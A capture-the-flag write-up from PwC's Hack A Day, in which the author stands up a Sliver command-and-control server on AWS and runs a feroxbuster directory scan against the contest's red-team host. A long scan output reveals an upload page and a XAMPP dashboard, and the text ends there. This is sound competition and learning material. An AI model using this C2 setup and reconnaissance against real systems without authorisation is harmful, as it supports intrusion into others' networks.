Taking On PWC's Active Directory Challenges Again
Last updated
Last updated
I’m back from another incredible round of PwC’s Capture the Flag (CTF) competition! Held on November 11 as part of PwC Hong Kong’s 8th Annual Hack A Day. As someone who participated in this CTF last year too, it was exciting to see familiar faces, new challenges, and more cutting-edge cybersecurity tools. For this year, it was my redemption arc for last year's mistake when solving the Active Directory challenges. In context, in jeopardy style Capture the Flag competitions, it is rare to see Boot2Root challenges. However, it is even rarer to find Active Directory challenges.
Now, reflecting on last year's Active Directory challenges, what went wrong? First of all, unlike TryHackMe, HacktheBox or even Proving Grounds, the CTF did not provide a VPN connection to the network. Hence, the IP address that the organisers gave us was a public IP address. What does that mean for the attacker? In simple terms, the attacker must either port forward several ports through the router or use ngrok as a medium for catching a reverse shell, which will take a lot of configuration. For that reason, this year I made a Sliver C2 server on the cloud since I will be taking the OSEP certification and wanted to learn Sliver for that.
On AWS, I configured a t2.medium EC2 instance with Kali Linux installed. Once I got the instance up and running, I ran the following commands to get the C2 server setup.
sudo apt update && sudo apt -y full-upgrade
sudo apt install kali-linux-default
sudo apt install sliver autorecon fish
chsh -s $(which fish)
sudo chsh -s $(which fish)I configured Sliver as a service by putting the following contents into /etc/systemd/system/sliver.service
[Unit]
Description=Sliver
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=on-failure
RestartSec=3
User=kali
ExecStart=/usr/bin/sliver-server daemon
[Install]
WantedBy=multi-user.target\Finally, enabling it with:
sudo chmod 600 /etc/systemd/system/sliver.serviceI started the server by entering the following commands:
sudo systemctl start sliverOnce the server is up, I entered sliver-server to start configuring the necessary tools and creating an operator.
armory install allnew-operator --name jigsaw --lhost <EC2_IP_ADDRESS>After creating an operator, a configuration file was generated and I imported it into sliver-client by using:
sliver-client import <CONFIGURATION_FILE>Category : Red Team
Points : 50
Two easily accessible external-facing services are there for obtaining initial access! If you have flags from external servers, attempt to input them into either Easy Initial Access - 1 or Easy Initial Access - 2. Both entry points offer identical information to assist you in hacking into the corporate internal network!
Flag format for red team: Hack{[sha256string]}
So, I started by enumerating a web service, which I guessed existed. By the way, never assume this, I just assumed there was a web service lol.
feroxbuster --url http://redteam-w324duut.darklabhackaday.com -d 4 -t 100 -o feroxbuster.txt -x asp,aspx,html,php,xml,json,txt,log,sql,db,bak,sqlite,zip,pdf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -C 404,400These were the results of the scan:
302 GET 0l 0w 0c http://redteam-w324duut.darklabhackaday.com/ => http://redteam-w324duut.darklabhackaday.com/dashboard/
301 GET 9l 30w 382c http://redteam-w324duut.darklabhackaday.com/img => http://redteam-w324duut.darklabhackaday.com/img/
200 GET 3l 16w 1549c http://redteam-w324duut.darklabhackaday.com/img/module_table_bottom.png
200 GET 5l 9w 694c http://redteam-w324duut.darklabhackaday.com/img/module_table_top.png
302 GET 0l 0w 0c http://redteam-w324duut.darklabhackaday.com/index.php => http://redteam-w324duut.darklabhackaday.com/dashboard/
301 GET 9l 30w 386c http://redteam-w324duut.darklabhackaday.com/uploads => http://redteam-w324duut.darklabhackaday.com/uploads/
200 GET 16l 32w 406c http://redteam-w324duut.darklabhackaday.com/uploads/upload.php
302 GET 0l 0w 0c http://redteam-w324duut.darklabhackaday.com/Index.php => http://redteam-w324duut.darklabhackaday.com/dashboard/
503 GET 11l 44w 425c http://redteam-w324duut.darklabhackaday.com/examples
403 GET 11l 47w 444c http://redteam-w324duut.darklabhackaday.com/licenses
200 GET 17l 21w 177c http://redteam-w324duut.darklabhackaday.com/bitnami.css
200 GET 79l 250w 3607c http://redteam-w324duut.darklabhackaday.com/applications.html
403 GET 11l 47w 444c http://redteam-w324duut.darklabhackaday.com/phpmyadmin
200 GET 130l 436w 5187c http://redteam-w324duut.darklabhackaday.com/dashboard/index.html
200 GET 123l 377w 5680c http://redteam-w324duut.darklabhackaday.com/dashboard/howto.html
200 GET 7l 57w 2442c http://redteam-w324duut.darklabhackaday.com/dashboard/images/fastly-logo.png
200 GET 8l 76w 4088c http://redteam-w324duut.darklabhackaday.com/dashboard/images/fastly-logo@2x.png
200 GET 516l 3755w 31519c http://redteam-w324duut.darklabhackaday.com/dashboard/faq.html
200 GET 376l 890w 6876c http://redteam-w324duut.darklabhackaday.com/dashboard/stylesheets/normalize.css
200 GET 723l 5244w 39391c http://redteam-w324duut.darklabhackaday.com/dashboard/stylesheets/asciidoctor.css
200 GET 9211l 36081w 406998c http://redteam-w324duut.darklabhackaday.com/dashboard/stylesheets/all.css
200 GET 33l 214w 12599c http://redteam-w324duut.darklabhackaday.com/dashboard/images/social-icons-large.png
200 GET 50l 99w 5427c http://redteam-w324duut.darklabhackaday.com/dashboard/images/xampp-logo.svg
200 GET 19l 154w 11138c http://redteam-w324duut.darklabhackaday.com/dashboard/images/social-icons-large@2x.png
200 GET 16l 155w 10943c http://redteam-w324duut.darklabhackaday.com/dashboard/images/sourceforge-logo.png
200 GET 27l 253w 19113c http://redteam-w324duut.darklabhackaday.com/dashboard/images/sourceforge-logo@2x.png
200 GET 5l 47w 2036c http://redteam-w324duut.darklabhackaday.com/dashboard/images/appleVM-logo.png
200 GET 7l 76w 3900c http://redteam-w324duut.darklabhackaday.com/dashboard/images/favicon.png
200 GET 10l 64w 2711c http://redteam-w324duut.darklabhackaday.com/dashboard/images/linux-logo.png
200 GET 11l 79w 4243c http://redteam-w324duut.darklabhackaday.com/dashboard/images/background.png
200 GET 6l 66w 2819c http://redteam-w324duut.darklabhackaday.com/dashboard/images/windows-logo.png
200 GET 17l 132w 9021c http://redteam-w324duut.darklabhackaday.com/dashboard/images/social-icons@2x.png
200 GET 13l 93w 5327c http://redteam-w324duut.darklabhackaday.com/dashboard/images/social-icons.png
200 GET 15l 93w 6731c http://redteam-w324duut.darklabhackaday.com/dashboard/images/pdf-icon.png
200 GET 5l 47w 2036c http://redteam-w324duut.darklabhackaday.com/dashboard/images/apple-logo.png
200 GET 37l 267w 20117c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stack-icons@2x.png
200 GET 40l 202w 14635c http://redteam-w324duut.darklabhackaday.com/dashboard/images/xampp-newsletter-logo.png
200 GET 37l 265w 20115c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stack-icons.png
200 GET 71l 573w 44633c http://redteam-w324duut.darklabhackaday.com/dashboard/images/middleman.png
200 GET 85l 555w 39860c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp.png
200 GET 53l 392w 31074c http://redteam-w324duut.darklabhackaday.com/dashboard/images/addons-video-thumb.png
200 GET 116l 679w 55358c http://redteam-w324duut.darklabhackaday.com/dashboard/images/xampp-cloud@2x.png
200 GET 63l 321w 29058c http://redteam-w324duut.darklabhackaday.com/dashboard/images/xampp-cloud.png
200 GET 415l 982w 45676c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-11.png
200 GET 3l 18w 953c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/fr.png
200 GET 247l 765w 41974c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-php-output.png
200 GET 357l 1795w 138791c http://redteam-w324duut.darklabhackaday.com/dashboard/images/twitter-bird.png
200 GET 4l 20w 847c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/cn.png
200 GET 3l 23w 860c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/ro.png
200 GET 4l 20w 847c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/zh_cn.png
200 GET 4l 20w 704c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/ru.png
200 GET 3l 13w 1665c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stamps/stamp-80x15.gif
200 GET 5l 25w 1570c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stamps/stamp-88x31.gif
200 GET 293l 799w 40142c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-3.png
200 GET 9211l 36081w 407110c http://redteam-w324duut.darklabhackaday.com/dashboard/stylesheets/all-rtl.css
200 GET 293l 1440w 75826c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-4.png
200 GET 230l 1035w 160961c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager-network.jpg
200 GET 3l 13w 1211c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/pt_br.png
200 GET 5l 23w 700c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/hu.png
200 GET 5l 21w 744c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/jp.png
200 GET 18l 77w 3411c http://redteam-w324duut.darklabhackaday.com/dashboard/images/stamps/stamp-173x38.gif
200 GET 4l 19w 985c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/de.png
200 GET 3l 18w 795c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/es.png
200 GET 3l 16w 1056c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/ur.png
200 GET 4l 19w 887c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/tr.png
200 GET 3l 20w 1021c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/pt.png
200 GET 4l 19w 623c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/pl.png
200 GET 87l 511w 34878c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image2.png
200 GET 306l 1208w 87718c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-volumes.png
200 GET 82l 353w 27184c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/beltran-rueda.png
200 GET 3l 20w 780c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/zh_tw.png
200 GET 4l 18w 1088c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/en.png
200 GET 4l 24w 714c http://redteam-w324duut.darklabhackaday.com/dashboard/images/flags/it.png
200 GET 200l 516w 30995c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image6.png
200 GET 53l 283w 18022c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/paul-hinz.jpg
200 GET 238l 900w 46506c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-2.png
200 GET 82l 513w 37591c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image1.png
200 GET 71l 429w 32552c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/kay-vogelgesang.jpg
200 GET 118l 462w 38225c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/kai-seidler.jpg
200 GET 59l 418w 30054c http://redteam-w324duut.darklabhackaday.com/dashboard/images/team/daniel-lopez.png
200 GET 361l 1179w 63156c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image7.png
200 GET 870l 4669w 77125c http://redteam-w324duut.darklabhackaday.com/dashboard/phpinfo.php
200 GET 79l 250w 3607c http://redteam-w324duut.darklabhackaday.com/Applications.html
200 GET 57l 329w 30430c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image4.png
200 GET 190l 939w 149693c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager-services.jpg
200 GET 646l 2898w 150902c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-7.png
200 GET 662l 2987w 200091c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image3.png
200 GET 391l 736w 32055c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-10.png
200 GET 192l 819w 111554c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-launch-credentials.jpg
200 GET 317l 1398w 102812c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-network.png
200 GET 269l 825w 45058c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-1.png
200 GET 453l 2324w 158417c http://redteam-w324duut.darklabhackaday.com/dashboard/images/bitnami-xampp/image5.png
200 GET 213l 962w 121742c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-download-installer.jpg
200 GET 267l 982w 70802c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-manager.png
200 GET 69l 596w 45129c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/download-xampp-vm.png
200 GET 261l 1347w 101068c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-general.png
200 GET 198l 879w 148586c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager.jpg
200 GET 1085l 2446w 95994c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-8.png
200 GET 213l 796w 131162c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager-volumes.jpg
301 GET 9l 30w 395c http://redteam-w324duut.darklabhackaday.com/dashboard/images => http://redteam-w324duut.darklabhackaday.com/dashboard/images/
200 GET 388l 2189w 119541c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-9.png
200 GET 209l 978w 166567c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-stack-manager-general.jpg
200 GET 484l 2227w 119307c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-6.png
200 GET 732l 2220w 112133c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-cakephp-5.png
200 GET 385l 1620w 180620c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-run-installer.jpg
301 GET 9l 30w 393c http://redteam-w324duut.darklabhackaday.com/dashboard/docs => http://redteam-w324duut.darklabhackaday.com/dashboard/docs/
200 GET 514l 2774w 217526c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-tray.png
200 GET 9l 24w 205c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-different-php-version.pdfmarks
200 GET 9l 21w 194c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/auto-start-xampp.pdfmarks
200 GET 415l 3307w 178294c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/xampp-vm-php-finder.png
200 GET 9l 22w 201c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-vhosts.pdfmarks
200 GET 9l 26w 214c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf1.pdfmarks
200 GET 1733l 4717w 63573c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-sqlite.pdf
200 GET 9l 24w 212c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/access-phpmyadmin-remotely.pdfmarks
200 GET 141l 400w 5035c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/increase-php-file-upload-limit.html
200 GET 9l 22w 213c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-wildcard-subdomains.pdfmarks
200 GET 491l 1265w 8252c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/change-mysql-temp-dir.pdf
200 GET 258l 880w 8922c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/transfer-files-ftp.html
200 GET 259l 1111w 10703c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/send-mail.html
200 GET 1241l 3311w 46923c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-php-fcgi.pdf
200 GET 455l 1433w 50421c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/auto-start-xampp.pdf
200 GET 1118l 3102w 65875c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-different-php-version.pdf
200 GET 996l 7189w 909082c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-windows-start.jpg
200 GET 347l 1465w 14053c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/backup-restore-mysql.html
200 GET 950l 4698w 417860c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/heartbleed-affected-osx.png
200 GET 2220l 6600w 143895c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-wildcard-subdomains.pdf
200 GET 509l 2484w 251673c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-wordpress.jpg
200 GET 440l 2399w 256922c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/heartbleed-affected.png
200 GET 356l 2370w 238837c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/heartbleed-fixed.png
200 GET 1071l 7077w 888496c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-linux-start.jpg
301 GET 9l 30w 395c http://redteam-w324duut.darklabhackaday.com/dashboard/Images => http://redteam-w324duut.darklabhackaday.com/dashboard/Images/
200 GET 428l 5896w 332579c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/phpinfo-section-2.png
200 GET 403l 2814w 283442c http://redteam-w324duut.darklabhackaday.com/dashboard/images/blog/phpinfo-section-1.png
200 GET 990l 7221w 899476c http://redteam-w324duut.darklabhackaday.com/dashboard/images/screenshots/xampp-macosx-start.jpg
200 GET 8l 76w 4088c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/fastly-logo@2x.png
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/de => http://redteam-w324duut.darklabhackaday.com/dashboard/de/
200 GET 516l 3755w 31519c http://redteam-w324duut.darklabhackaday.com/dashboard/FAQ.html
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/es => http://redteam-w324duut.darklabhackaday.com/dashboard/es/
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/pl => http://redteam-w324duut.darklabhackaday.com/dashboard/pl/
200 GET 130l 436w 5187c http://redteam-w324duut.darklabhackaday.com/dashboard/
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/tr => http://redteam-w324duut.darklabhackaday.com/dashboard/tr/
301 GET 9l 30w 388c http://redteam-w324duut.darklabhackaday.com/dashboard => http://redteam-w324duut.darklabhackaday.com/dashboard/
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/fr => http://redteam-w324duut.darklabhackaday.com/dashboard/fr/
200 GET 228l 890w 9132c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-use-tomcat.html
200 GET 202l 797w 8232c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/activate-use-xdebug.html
200 GET 716l 2108w 53180c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/access-phpmyadmin-remotely.pdf
200 GET 9l 24w 220c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/backup-restore-mysql.pdfmarks
200 GET 255l 903w 9661c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf2.html
200 GET 9l 24w 215c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/reset-mysql-password.pdfmarks
200 GET 9l 24w 209c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-use-tomcat.pdfmarks
200 GET 232l 955w 9150c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-sqlite.html
200 GET 138l 402w 4954c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/auto-start-xampp.html
200 GET 9l 23w 196c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-sqlite.pdfmarks
200 GET 9l 23w 201c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/activate-use-xdebug.pdfmarks
200 GET 247l 1024w 10426c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-wildcard-subdomains.html
200 GET 1913l 5341w 94836c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf1.pdf
200 GET 9l 23w 199c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-php-fcgi.pdfmarks
200 GET 9l 26w 214c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf2.pdfmarks
200 GET 205l 588w 6848c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-php-fcgi.html
200 GET 9l 25w 220c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/change-mysql-temp-dir.pdfmarks
200 GET 182l 556w 6476c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/reset-mysql-password.html
200 GET 2007l 7708w 329917c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/transfer-files-ftp.pdf
200 GET 9l 24w 209c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/deploy-git-app.pdfmarks
200 GET 9l 23w 214c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/troubleshoot-apache.pdfmarks
200 GET 2063l 6324w 157912c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-vhosts.pdf
200 GET 404l 1469w 14538c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/troubleshoot-apache.html
200 GET 185l 646w 6965c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/use-different-php-version.html
200 GET 9l 22w 198c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/transfer-files-ftp.pdfmarks
200 GET 9l 25w 212c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/increase-php-file-upload-limit.pdfmarks
200 GET 9l 23w 196c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/send-mail.pdfmarks
200 GET 157l 444w 5569c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/access-phpmyadmin-remotely.html
200 GET 233l 790w 8615c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf1.html
200 GET 2497l 7555w 223960c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/create-framework-project-zf2.pdf
200 GET 50l 99w 5427c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/xampp-logo.svg
200 GET 1985l 7213w 358821c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-use-tomcat.pdf
200 GET 244l 1024w 10172c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/configure-vhosts.html
200 GET 135l 389w 4916c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/change-mysql-temp-dir.html
200 GET 357l 1795w 138791c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/twitter-bird.png
200 GET 33l 214w 12599c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/social-icons-large.png
200 GET 27l 253w 19113c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/sourceforge-logo@2x.png
200 GET 1993l 5633w 186879c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/activate-use-xdebug.pdf
200 GET 577l 1455w 9437c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/increase-php-file-upload-limit.pdf
200 GET 15l 93w 6731c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/pdf-icon.png
200 GET 2202l 6080w 102037c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/send-mail.pdf
200 GET 194l 864w 8649c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/deploy-git-app.html
200 GET 130l 436w 5187c http://redteam-w324duut.darklabhackaday.com/dashboard/Index.html
200 GET 40l 202w 14635c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/xampp-newsletter-logo.png
200 GET 1694l 5251w 203968c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/deploy-git-app.pdf
200 GET 53l 283w 18022c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/team/paul-hinz.jpg
200 GET 1007l 3248w 96850c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/reset-mysql-password.pdf
200 GET 118l 462w 38225c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/team/kai-seidler.jpg
200 GET 5l 21w 744c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/jp.png
200 GET 4l 20w 847c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/cn.png
200 GET 3l 18w 795c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/es.png
200 GET 4l 20w 847c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/zh_cn.png
200 GET 3l 18w 953c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/fr.png
200 GET 4l 24w 714c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/it.png
200 GET 4l 18w 1088c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/en.png
200 GET 4l 19w 887c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/tr.png
200 GET 5l 23w 700c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/hu.png
200 GET 71l 573w 44633c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/middleman.png
200 GET 53l 392w 31074c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/addons-video-thumb.png
200 GET 6l 66w 2819c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/windows-logo.png
200 GET 85l 555w 39860c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp.png
200 GET 5l 47w 2036c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/apple-logo.png
200 GET 116l 679w 55358c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/xampp-cloud@2x.png
200 GET 5l 47w 2036c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/appleVM-logo.png
200 GET 3708l 12696w 520057c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/backup-restore-mysql.pdf
200 GET 3l 13w 1211c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/flags/pt_br.png
200 GET 37l 267w 20117c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/stack-icons@2x.png
200 GET 16l 155w 10943c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/sourceforge-logo.png
200 GET 13l 93w 5327c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/social-icons.png
200 GET 293l 1440w 75826c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-4.png
200 GET 7l 76w 3900c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/favicon.png
200 GET 247l 765w 41974c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-php-output.png
200 GET 269l 825w 45058c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-1.png
200 GET 4360l 16918w 859090c http://redteam-w324duut.darklabhackaday.com/dashboard/docs/troubleshoot-apache.pdf
200 GET 293l 799w 40142c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-3.png
200 GET 238l 900w 46506c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-2.png
200 GET 7l 57w 2442c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/fastly-logo.png
200 GET 484l 2227w 119307c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-6.png
200 GET 267l 982w 70802c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-manager.png
200 GET 317l 1398w 102812c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-network.png
200 GET 213l 796w 131162c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager-volumes.jpg
200 GET 403l 2814w 283442c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/phpinfo-section-1.png
301 GET 9l 30w 391c http://redteam-w324duut.darklabhackaday.com/dashboard/ru => http://redteam-w324duut.darklabhackaday.com/dashboard/ru/
200 GET 10l 64w 2711c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/linux-logo.png
200 GET 198l 879w 148586c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager.jpg
200 GET 19l 154w 11138c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/social-icons-large@2x.png
200 GET 209l 978w 166567c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager-general.jpg
200 GET 514l 2774w 217526c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-tray.png
200 GET 17l 132w 9021c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/social-icons@2x.png
200 GET 11l 79w 4243c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/background.png
200 GET 261l 1347w 101068c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-general.png
200 GET 190l 939w 149693c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager-services.jpg
200 GET 213l 962w 121742c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-download-installer.jpg
200 GET 646l 2898w 150902c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-7.png
200 GET 230l 1035w 160961c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager-network.jpg
200 GET 192l 819w 111554c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-launch-credentials.jpg
200 GET 453l 2324w 158417c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image5.png
200 GET 200l 516w 30995c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image6.png
200 GET 87l 511w 34878c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image2.png
200 GET 82l 513w 37591c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image1.png
200 GET 57l 329w 30430c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image4.png
200 GET 361l 1179w 63156c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image7.png
